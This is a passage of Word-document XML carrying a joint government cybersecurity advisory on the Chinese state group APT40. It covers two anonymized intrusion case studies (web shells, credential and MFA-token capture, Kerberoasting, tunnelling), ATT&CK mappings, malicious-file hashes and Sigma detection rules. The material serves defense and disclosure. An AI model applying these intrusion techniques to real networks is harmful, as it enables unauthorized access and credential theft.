        <w:t>Indicator Removal: Timestomp T1070.006 CISA's red team modified file timestamps to hide their operational activity.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product is provided subject to this Notification and this Privacy &amp; Use policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cybersecurity and Infrastructure Security Agency 2024.07.11 17:52</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-193a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>People's Republic of China (PRC) Ministry of State Security APT40 Tradecraft in Action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Release Date July 08, 2024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Alert Code AA24-190A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Cyber Threats and Advisories, Nation-State Cyber Actors, Organizations and Cyber Safety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Overview Background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advisory, authored by the Australian Signals Directorate's Australian Cyber Security Centre (ASD's ACSC), the United States Cybersecurity and Infrastructure Security Agency (CISA), the United States National Security Agency (NSA), the United States Federal Bureau of Investigation (FBI), the United Kingdom National Cyber Security Centre (NCSC-UK), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), the German Federal Intelligence Service (BND) and Federal Office for the Protection of the Constitution (BfV), the Republic of Korea's National Intelligence Service (NIS) and NIS' National Cyber Security Center, and Japan's National Center of Incident Readiness and Strategy for Cybersecurity (NISC) and National Policy Agency (NPA)- hereafter referred to as the "authoring agencies"-outlines a People's Republic of China (PRC) state-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sponsored cyber group and their current threat to Australian networks. The advisory draws on the authoring agencies' shared understanding of the threat as well as ASD's ACSC incident response investigations.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PRC state-sponsored cyber group has previously targeted organizations in various countries, including Australia and the United States, and the techniques highlighted below are regularly used by other PRC state- sponsored actors globally. Therefore, the authoring agencies believe the group, and similar techniques remain a threat to their countries' networks as well.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authoring agencies assess that this group conduct malicious cyber operations for the PRC Ministry of State Security (MSS). The activity and techniques overlap with the groups tracked as Advanced Persistent Threat (APT) 40 (also known as Kryptonite Panda, GINGHAM TYPHOON, Leviathan and Bronze Mohawk in industry reporting). This group has previously been reported as being based in Haikou, Hainan Province, PRC and receiving tasking from the PRC MSS, Hainan State Security Department.[1]</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following Advisory provides a sample of significant case studies of this adversary's techniques in action against two victim networks. The case studies are consequential for cybersecurity practitioners to identify, prevent and remediate APT40 intrusions against their own networks. The selected case studies are those where appropriate remediation has been undertaken reducing the risk of re-exploitation by this threat actor, or others. As such, the case studies are naturally older in nature, to ensure organizations were given the necessary time to remediate.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 download the PDF version of this report, visit the following link. Activity Summary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APT40 has repeatedly targeted Australian networks as well as government and private sector networks in the region, and the threat they pose to our networks is ongoing. The tradecraft described in this advisory is regularly observed against Australian networks.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Notably, APT40 possesses the capability to rapidly transform and adapt exploit proof-of-concept(s) (POCs) of new vulnerabilities and immediately utilize them against target networks possessing the infrastructure of the associated vulnerability. APT40 regularly conducts reconnaissance against networks of interest, including networks in the authoring agencies' countries, looking for opportunities to compromise its targets. This regular reconnaissance postures the group to identify vulnerable, end-of- life or no longer maintained devices on networks of interest, and to rapidly deploy exploits. APT40 continues to find success exploiting vulnerabilities from as early as 2017.</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APT40 rapidly exploits newly public vulnerabilities in widely used software such as Log4J (CVE-2021-44228), Atlassian Confluence (CVE-2021-31207, CVE- 2021-26084) and Microsoft Exchange (CVE-2021-31207, CVE-2021-34523, CVE- 2021-34473). ASD's ACSC and the authoring agencies expect the group to continue using POCs for new high-profile vulnerabilities within hours or days of public release.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 TTP Flowchart for APT40 activity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group appears to prefer exploiting vulnerable, public-facing infrastructure over techniques that require user interaction, such as phishing campaigns, and places a high priority on obtaining valid credentials to enable a range of follow-on activities. APT40 regularly uses web shells [T1505.003] for persistence, particularly early in the life cycle of an intrusion. Typically, after successful initial access APT40 focuses on establishing persistence to maintain access on the victim's environment. However, as persistence occurs early in an intrusion, it is more likely to be observed in all intrusions-regardless of the extent of compromise or further actions taken. Notable Tradecraft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Although APT40 has previously used compromised Australian websites as command and control (C2) hosts for its operations, the group have evolved this technique [T1594].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APT40 has embraced the global trend of using compromised devices, including small-office/home-office (SOHO) devices, as operational infrastructure and last-hop redirectors [T1584.008] for its operations in Australia. This has enabled the authoring agencies to better characterize and track this group's movements.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Many of these SOHO devices are end-of-life or unpatched and offer a soft target for N-day exploitation. Once compromised, SOHO devices offer a launching point for attacks that is designed to blend in with legitimate traffic and challenge network defenders [T1001.003].</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technique is also regularly used by other PRC state-sponsored actors worldwide, and the authoring agencies consider this to be a shared threat. For additional information, see joint advisories People's Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices and PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure.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APT40 does occasionally use procured or leased infrastructure as victim- facing C2 infrastructure in its operations; however, this tradecraft appears to be in relative decline. Tooling</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ASD's ACSC are sharing some of the malicious files identified during the investigations outlined below. These files have been uploaded to VirusTotal to enable the wider network defense and cyber security communities to better understand the threats they need to defend against.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">MD5 Filename Additional information 26a5a7e71a601be991073c78d513dee3 horizon.jsp 1 kB | Java Source 87c88f06a7464db2534bc78ec2b915de Index_jsp$ProxyEndpoint$Attach.class 597 B | Java Bytecode 6a9bc68c9bc5cefaf1880ae6ffb1d0ca Index_jsp.class 5 kB | Java Bytecode 64454645a9a21510226ab29e01e76d39 Index_jsp.java 5 kB | Java Source e2175f91ce3da2e8d46b0639e941e13f Index_jsp$ProxyEndpoint.class 4 kB | Java Bytecode 9f89f069466b8b5c9bf25c9374a4daf8 Index_jsp$ProxyEndpoint$1.class 3 kB | Java Bytecode 187d6f2ed2c80f805461d9119a5878ac Index_jsp$ProxyEndpoint$2.class 1 kB | Java Bytecode ed7178cec90ed21644e669378b3a97ec Nova_jsp.class 7 kB | Java Bytecode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5bf7560d0a638e34035f85cd3788e258 Nova_jsp$TomcatListenerMemShellFromThread.class 8 kB | Java Bytecode e02be0dc614523ddd7a28c9e9d500cff Nova_jsp.java 15 kB | Java Source Case Studies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ASD's ACSC are sharing two anonymized investigative reports to provide awareness of how the actors employ their tools and tradecraft. Case Study 1 This report has been anonymized to enable wider dissemination. The impacted organization is hereafter referred to as "the organization." Some specific details have been removed to protect the identity of the victim and incident response methods of ASD's ACSC.</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Executive Summary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report details the findings of the ASD's ACSC investigation into the successful compromise of the organization's network between July and September 2022. This investigative report was provided to the organization to summarize observed malicious activity and frame remediation recommendations. The findings indicate the compromise was undertaken by APT40.</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mid-August, the ASD's ACSC notified the organization of malicious interactions with their network from a likely compromised device being used by the group in late August and, with the organization's consent, the ASD's ACSC deployed host-based sensors to likely affected hosts on the organization's network. These sensors allowed ASD's ACSC incident response analysts to undertake a thorough digital forensics investigation. Using available sensor data, the ASD's ACSC analysts successfully mapped the group's activity and created a detailed timeline of observed events.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From July to August, key actor activity observed by the ASD's ACSC included: Host enumeration, which enables an actor to build their own map of the network; Web shell use, giving the actor an initial foothold on the network and a capability to execute commands; and Deployment of other tooling leveraged by the actor for malicious purposes.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investigation uncovered evidence of large amounts of sensitive data being accessed and evidence that the actors moved laterally through the network [T1021.002]. Much of the compromise was facilitated by the group's establishment of multiple access vectors into the network, the network having a flat structure, and the use of insecure internally developed software that could be used to arbitrarily upload files. Exfiltrated data included privileged authentication credentials that enabled the group to log in, as well as network information that would allow the actors to regain unauthorized access if the original access vector was blocked. No additional malicious tooling was discovered beyond those on the initially exploited machine; however, a group's access to legitimate and privileged credentials would negate the need for additional tooling. Findings from the investigation indicate the organization was likely deliberately targeted by APT40, as opposed to falling victim opportunistically to a publicly known vulnerability. Investigation Findings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mid-August 2022, the ASD's ACSC notified the organization that a confirmed malicious IP believed to be affiliated with a state-sponsored cyber group had interacted with the organization's computer networks between at least July and August. The compromised device probably belonged to a small business or home user.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late August, the ASD's ACSC deployed a host-based agent to hosts on the organization's network which showed evidence of having been impacted by the compromise.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artefacts which could have supported investigation efforts were not available due to the configuration of logging or network design. Despite this, the organization's readiness to provide all available data enabled ASD's ACSC incident responders to conduct comprehensive analysis and to form an understanding of likely APT40 activity on the network.</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September, after consultation with the ASD's ACSC, the organization decided to denylist the IP identified in the initial notification. In October, the organization commenced remediation. Details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Beginning in July, actors were able to test and exploit a custom web application [T1190] running on &lt;webapp&gt;2-ext, which enables the group to establish a foothold in the network demilitarized zone (DMZ). This was leveraged to enumerate both the network as well as all visible domains. Compromised credentials [T1078.002] were used to query the Active Directory [T1018] and exfiltrate data by mounting file shares [T1039] from multiple machines within the DMZ. The actor carried out a Kerberoasting attack in order to obtain valid network credentials from a server [T1558.003]. The group were not observed gaining any additional points of presence in either the DMZ or the internal network. Visual Timeline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below timeline provides a broad overview of the key phases of malicious actor activity observed on the organization's network.</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Detailed Timeline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July: The actors established an initial connection to the front page of a custom web application [T1190] built for the organization (hereafter referred to as the "web application" or "webapp") via a transport layer security (TLS) connection [T1102]. No other noteworthy activity was observed.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July: The actors begin enumerating the web application's website looking for endpoints[2] to further investigate.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July: The actors concentrate on attempts to exploit a specific endpoint.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July: The actors are able to successfully POST to the web server, probably via a web shell placed on another page. A second IP, likely employed by the same actors, also begins posting to the same URL. The actors created and tested a number of likely web shells.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exact method of exploitation is unknown, but it is clear that the specific endpoint was targeted to create files on &lt;webapp&gt;2-ext.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ASD's ACSC believes that the two IP address connections were part of the same intrusion due to their shared interest and initial connections occurring minutes apart.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July: The group continue to conduct host enumeration, looking for privilege escalation opportunities, and deploying a different web shell. The actors log into the web application using compromised credentials for &lt;firstname.surname&gt;@&lt;organisation domain&gt;.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actors' activity does not appear to have successfully achieved privilege escalation on &lt;webapp&gt;2-ext. Instead, the actors pivoted to network-based activity.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July: The actor tests the compromised credentials for a service account[3] which it likely found hardcoded in internally accessible binaries.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July: The actors deploy the open-source tool Secure Socket Funnelling, which was used to connect out to the malicious infrastructure. This connection is employed to tunnel traffic from the actor's attack machines into the organization's internal networks, whose machine names are exposed in event logs as they attempt to use the credentials for the service account.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August: The actors are seen conducting a limited amount of activity, including failing to establish connections involving the service account.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August: The actors perform significant network and Active Directory enumeration. A different compromised account is subsequently employed to mount shares[4] on Windows machines within the DMZ, enabling successful data exfiltration.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seems to be opportunistic usage of a stolen credential on mountable machines in the DMZ. Firewalls blocked the actor from targeting the internal network with similar activity.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August - September: The SSF tool re-established a connection to a malicious IP. The group are not observed performing any additional activities until their access is blocked.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September: The organization blocks the malicious IP by denylisting it on their firewalls. Actor Tactics and Techniques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MITRE ATT&amp;CK framework is a documented collection of tactics and techniques employed by threat actors in cyberspace. The framework was created by U.S. not-for-profit The MITRE Corporation and functions as a common global language around threat actor behavior.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ASD's ACSC assesses the following techniques and tactics to be relevant to the actor's malicious activity: Reconnaissance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T1594 - Search Victim-Owned Websites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actor enumerated the custom web application's website to identify opportunities for accessing the network. Initial Access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T1190 - Exploit Public-Facing Application (regarding exploiting the custom web application)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T1078.002 - Valid Accounts: Domain Accounts (regarding logging on with comprised credentials)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Exploiting internet-exposed custom web applications provided an initial point of access for the actor. The actor was later able to use credentials they had compromised to further their access to the network. Execution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T1059 - Command and Scripting Interpreter (regarding command execution through the web shell)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T1072 - Software Deployment Tools (regarding the actor using open-source tool Secure Socket Funnelling (SSF) to connect to an IP) Persistence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T1505.003 - Server Software Component: Web Shell (regarding use of a web shell and SSF to establish access) Credential Access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T1552.001 - Credentials from Password Stores (regarding password files relating to building management system [BMS])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T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting (regarding attack to gain network credentials) Lateral movement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T1021.002 - Remote Services: SMB Shares (regarding the actor mounting SMB shares from multiple devices) Collection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T1213 - Data from Information Repositories (regarding manuals/documentation found on the BMS server) Exfiltration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T1041 - Exfiltration Over C2 Channel (regarding the actor's data exfiltration from Active Directory and mounting shares) Case Study 2 This report has been anonymized to enable wider dissemination. The impacted organization is hereafter referred to as "the organization." Some specific details have been removed to protect the identity of the victim and incident response methods of ASD's ACSC. Executive Summary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report details the findings of ASD's ACSC investigation into the successful compromise of the organization's network in April 2022. This investigation report was provided to the organization to summarize observed malicious activity and frame remediation recommendations. The findings indicate the compromise was undertaken by APT40.</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May 2022, ASD's ACSC notified an organization of suspected malicious activity impacting the organization's network since April 2022.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Subsequently, the organization informed ASD's ACSC that they had discovered malicious software on an internet-facing server which provided the login portal for the organization's corporate remote access solution. This server used a remote access login and identity management product and will be referred to in this report as 'the compromised appliance'. This report details the investigation findings and remediation advice developed for the organization in response to the investigation conducted by the ASD's ACSC.</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Evidence indicated that part of the organization's network had been compromised by malicious cyber actor(s) via the organization's remote access login portal since at least April 2022. This server may have been compromised by multiple actors, and was likely affected by a remote code execution (RCE) vulnerability that was widely publicized around the time of the compromise.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Key actor activity observed by the ASD's ACSC included: Host enumeration, which enables an actor to build their own map of the network; Exploitation of internet-facing applications and web shell use, giving the actor an initial foothold on the network and a capability to execute commands; Exploitation of software vulnerabilities to escalate privileges; and Credential collection to enable lateral movement.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ASD's ACSC discovered that a malicious actor had exfiltrated several hundred unique username and password pairs on the compromised appliance in April 2022, as well as a number of multi-factor authentication codes and technical artefacts related to remote access sessions. Upon a review by the organization, the passwords were found to be legitimate. The ASD's ACSC assesses that the actor may have collected these technical artefacts to hijack or create a remote login session as a legitimate user, and access the organization's internal corporate network using a legitimate user account. Investigation Summary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ASD's ACSC determined that the actor compromised appliance(s) which provide remote login sessions for organization staff and used this compromise to attempt to conduct further activity. These appliances consist of three load-balanced hosts where the earliest evidence of compromise was detected. The organization shut down two of the three load-balanced hosts shortly after the initial compromise. As a result, all subsequent activity occurred on a single host. The other servers associated with the compromised appliance were also load-balanced in a similar manner. For legibility, all compromised appliances are referred to in most of this report as a "single appliance."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actor is believed to have used publicly known vulnerabilities to deploy web shells to the compromised appliance from April 2022 onwards. Threat actors from the group are assessed to have attained escalated privileges on the appliance. The ASD's ACSC could not determine the full extent of the activity due to lack of logging availability. However, evidence on the device indicates that an actor achieved the following: The collection of several hundred genuine username and password pairs; and The collection of technical artefacts which may have allowed a malicious actor to access a virtual desktop infrastructure (VDI) session as a legitimate user.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ASD's ACSC assesses that the actor would have sought to further the compromise of the organisation network. The artefacts exfiltrated by the actor may have allowed them to hijack or initiate virtual desktop sessions as a legitimate user, possibly as a user of their choice, including administrators. The actor may have used this access vector to further compromise organization services to achieve persistence and other goals.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 organization appliances within the hosting provider managed environment did not show evidence of compromise. Access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host with the compromised appliance provided authentication via Active Directory and a webserver, for users connecting to VDI sessions [T1021.001]. Location Compromised appliance hostnames (load-balanced) Datacentre 1 HOST1, HOST2, HOST3</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appliance infrastructure also included access gateway hosts that provide a tunnel to the VDI for the user, once they possess an authentication token generated and downloaded from the appliance.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was no evidence of compromise of any of these hosts. However, the access gateway hosts logs showed evidence of significant interactions with known malicious IP addresses. It is likely that this reflected activity that occurred on this host, or network connections with threat actor infrastructure that reached this host. The nature of this activity could not be determined using available evidence but indicates that the group sought to move laterally in the organization's network [TA0008].</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Internal Hosts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ASD's ACSC investigated limited data from the internal organization's network segment. Attempted or successful malicious activity known to have impacted the internal organization's network segment includes actor access to VDI-related artefacts, the scraping of an internal SQL server [T1505.001], and unexplained traffic observed going from known malicious IP addresses through the access gateway appliances [TA0011].</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Using their access to the compromised appliance, the group collected genuine usernames, passwords [T1003], and MFA token values [T1111]. The group also collected JSON Web Tokens (JWTs) [T1528], which is an authentication artefact used to create virtual desktop login sessions. The actor may have been able to use these to create or hijack virtual desktop sessions [T1563.002] and access the internal organization network segment as a legitimate user [T1078].</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actor also used access to the compromised appliance to scrape an SQL server [T1505.001], which resided in the organization's internal network. It is likely that the actor had access to this data.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Evidence available from the access gateway appliance revealed that network traffic occurred through or to this device from known malicious IP addresses. As described above, this may indicate that malicious cyber actors impacted or utilized this device, potentially to pivot into the internal network. Investigation Timeline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below list provides a timeline of key activities discovered during the investigation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Time Event April 2022 Known malicious IP addresses interact with access gateway host HOST7. The nature of the interactions could not be determined.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>April 2022</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All hosts, HOST1, HOST2 and HOST3, were compromised by a malicious actor or actors, and web shells were placed on the hosts.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log file was created or modified on HOST2. This file contains credential material likely captured by a malicious actor.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/etc/security/opasswd and /etc/shadow files were modified on HOST1 and HOST3, indicating that passwords were changed. Evidence available on HOST1 suggests that the password for user 'sshuser' was changed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>April 2022</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HOST2 was shut down by the organization.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Additional web shells (T1505.003) were created on HOST1 and HOST3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>HOST1experienced SSH brute force attempts from HOST3.</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log file was modified (T1070) on HOST3. This file contains credential material (T1078) likely captured by a malicious actor.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JWTs were captured (T1528) and output to a file on HOST3.</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HOST3 was shut down by the organization. All activity after this time occurs on HOST1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>April 2022 Additional web shells were created on HOST1 (T1505.003). JWTs were captured and output to a file on HOST1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>April 2022</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Additional web shells are created on HOST1 (T1505.003), and a known malicious IP address interacts with the host (TA0011).</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known malicious IP address interacts with access gateway host HOST7. May 2022</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known malicious IP address interacted with access gateway host HOST7 (TA0011).</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 authentication event for a user is linked to a known malicious IP address in logs on HOST1. An additional web shell is created on this host (T1505.003).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 2022 A script on HOST1 was modified by an actor (T1543). This script contains functionality which would have scraped data from an internal SQL server.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 2022 An additional log file on HOST1 was last modified (T1070). This file contains username and password pairs for the organization network, which are believed to be legitimate (T1078).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 2022 An additional log file was last modified (T1070). This file contains JWTs collected from HOST1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 2022 Additional web shells were created on HOST1 (T1505.003). On this date, the organization reported the discovery of a web shell with creation date in April 2022 to ASD's ACSC May 2022 A number of scripts were created on HOST1, including one named Log4jHotPatch.jar.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 2022 The iptables-save command was used to add two open ports to the access gateway host. The ports were 9998 and 9999 (T1572). Actor Tactics and Techniques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Highlighted below are several tactics and techniques identified during the investigation. Initial access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T1190 Exploit public facing application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group likely exploited RCE, privilege escalation, and authentication bypass vulnerabilities in the remote access login and identity management product to gain initial access to the network.</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initial access method is considered the most likely due to the following: The server was vulnerable to these CVEs at the time; Attempts to exploit these vulnerabilities from known actor infrastructure; and The first known internal malicious activity occurred shortly after attempted exploitation attempts were made. Execution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T1059.004 Command and Scripting Interpreter: Unix Shell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group successfully exploited the above vulnerabilities may have been able to run commands in a Unix shell available on the affected appliance.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Complete details of the commands run by actors cannot be provided as they were not logged by the appliance. Persistence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T1505.003 Server Software Component: Web Shell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Actors deployed several web shells on the affected appliance. It is possible that multiple distinct actors deployed web shells, but that only a smaller number of actors conducted activity using these web shells.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Web shells would have allowed for arbitrary command execution by the actor on the compromised appliances. Privilege escalation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T1068 Exploitation for Privilege Escalation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Available evidence does not describe the level of privilege attained by actors. However, using web shells, the actors would have achieved a level of privilege comparable to that of the web server on the compromised appliance. Vulnerabilities believed to have been present on the compromised appliance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would have allowed the actors to attain root privileges. Credential access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T1056.003 Input Capture: Web Portal Capture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Evidence on the compromised appliance showed that the actor had captured several hundred username-password pairs, in clear text, which are believed to be legitimate. It is likely that these were captured using some modification to the genuine authentication process which output the credentials to a file.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T1111 Multi-Factor Authentication Interception The actor also captured the value of MFA tokens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corresponding to legitimate logins. These were likely captured by modifying the genuine authentication process to output these values to a file. There is no evidence of compromise of the "secret server' which stores the unique values that provide for the security of MFA tokens.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T1040 Network Sniffing</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actor is believed to have captured JWTs by capturing HTTP traffic on the compromised appliance. There is evidence that the utility tcpdump was executed on the compromised appliance, which may have been how the actor captured these JWTs.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T1539 Steal Web Session Cookie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 described above, the actor captured JWTs, which are analogous to web session cookies. These could have been reused by the actor to establish further access. Discovery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T1046 Network Service Discovery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is evidence that network scanning utility nmap was executed on the compromised appliance to scan other appliances in the same network segment. This was likely used by the actor to discover other reachable network services which might present opportunities for lateral movement. Collection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Available evidence does not reveal how actors collected data or exactly what was collected from the compromised appliance or from other systems. However, it is likely that actors had access to all files on the compromised appliance, including the captured credentials [T1003], MFA token values [T1111], and JWTs described above. Command and Control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T1071.001 Application Layer Protocol: Web Protocols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Actors used web shells for command and control. Web shell commands would have been passed over HTTPS using the existing web server on the appliance [T1572].</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T1001.003 Data Obfuscation: Protocol Impersonation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Actors used compromised devices as a launching point for attacks that are designed to blend in with legitimate traffic. Detection and mitigation recommendations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ASD's ACSC strongly recommends implementing the ASD Essential Eight Controls and associated Strategies to Mitigate Cyber Security Incidents. Below are recommendations for network security actions that should be taken to detect and prevent intrusions by APT40, followed by specific mitigations for four key TTPs summarized in Table 1. Detection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of the files identified above were dropped in locations such as C:\Users\Public\* and C:\Windows\ Temp\*. These locations can be convenient spots for writing data as they are usually world writable, that is, all user accounts registered in Windows have access to these directories and their subdirectories. Often, any user can subsequently access these files, allowing opportunities for lateral movement, defense evasion, low-privilege execution and staging for exfiltration.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following Sigma rules look for execution from suspicious locations as an indicator of anomalous activity. In all instances, subsequent investigation is required to confirm malicious activity and attribution. Title: World Writable Execution - Temp</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ID: d2fa2d71-fbd0-4778-9449-e13ca7d7505c</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Description: Detect process execution from C:\ Windows\Temp.</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Background: This rule looks specifically for execution out of C:\ Windows\Temp\*. Temp is more broadly used by benign applications and thus a lower confidence malicious indicator than execution out of other world writable subdirectories in C:\Windows.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Removing applications executed by the SYSTEM or NETWORK SERVICE users substantially reduces the quantity of benign activity selected by this rule.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means that the rule may miss malicious executions at a higher privilege level but it is recommended to use other rules to determine if a user is attempting to elevate privileges to SYSTEM.</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Investigation: Examine information directly associated with this file execution, such as the user context, execution integrity level, immediate follow-on activity and images loaded by the file.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Investigate contextual process, network, file and other supporting data on the host to help make an assessment as to whether the activity is malicious. If necessary attempt to collect a copy of the file for reverse engineering to determine whether it is legitimate.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References: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Process Execution from an Unusual Directory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Author: ASD's ACSC</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Date: 2024/06/19</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Status: experimental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Tags: tlp.green classification.au.official attack.execution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Log Source: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category: process_creation product: windows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Detection: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temp: Image|startswith: 'C:\\Windows\\Temp\\'</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common_temp_path: Image|re|ignorecase: 'C:\\Windows\\Temp\\\{[a-fA-F0-9]{8}-([a-fA-F0-9]{4}- ){3}[a-fA-F0-9]{12}\}\\'</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system_user: User: 'SYSTEM' 'NETWORK SERVICE'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dismhost: Image|endswith: 'dismhost.exe'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known_parent: ParentImage|endswith: '\\esif_uf.exe' '\\vmtoolsd.exe' '\\cwainstaller.exe' '\\trolleyexpress.exe'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condition: temp and not (common_temp_path or system_user or dismhost or known_parent)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False positives: Allowlist auditing applications have been observed running executables from Temp. Temp will legitimately contain an array of setup applications and launchers, so it will be worth considering how prevalent this behavior is on a monitored network (and whether or not it can be allowlisted) before deploying this rule.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Level: low Title: World Writable Execution - Non-Temp System Subdirectory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ID: 5b187157-e892-4fc9-84fc-aa48aff9f997</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Description: Detect process execution from a world writable location in a subdirectory of the Windows OS install location.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Background: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rule looks specifically for execution out of world writable directories within C:\ and particularly C:\Windows\*, with the exception of C:\Windows\Temp (which is more broadly used by benign applications and thus a lower confidence malicious indicator).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AppData folders are excluded if a file is run as SYSTEM - this is a benign way in which many temporary application files are executed.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completing an initial network baseline and identifying known benign executions from these locations, this rule should rarely fire.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Investigation: Examine information directly associated with this file execution, such as the user context, execution integrity level, immediate follow-on activity and images loaded by the file.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
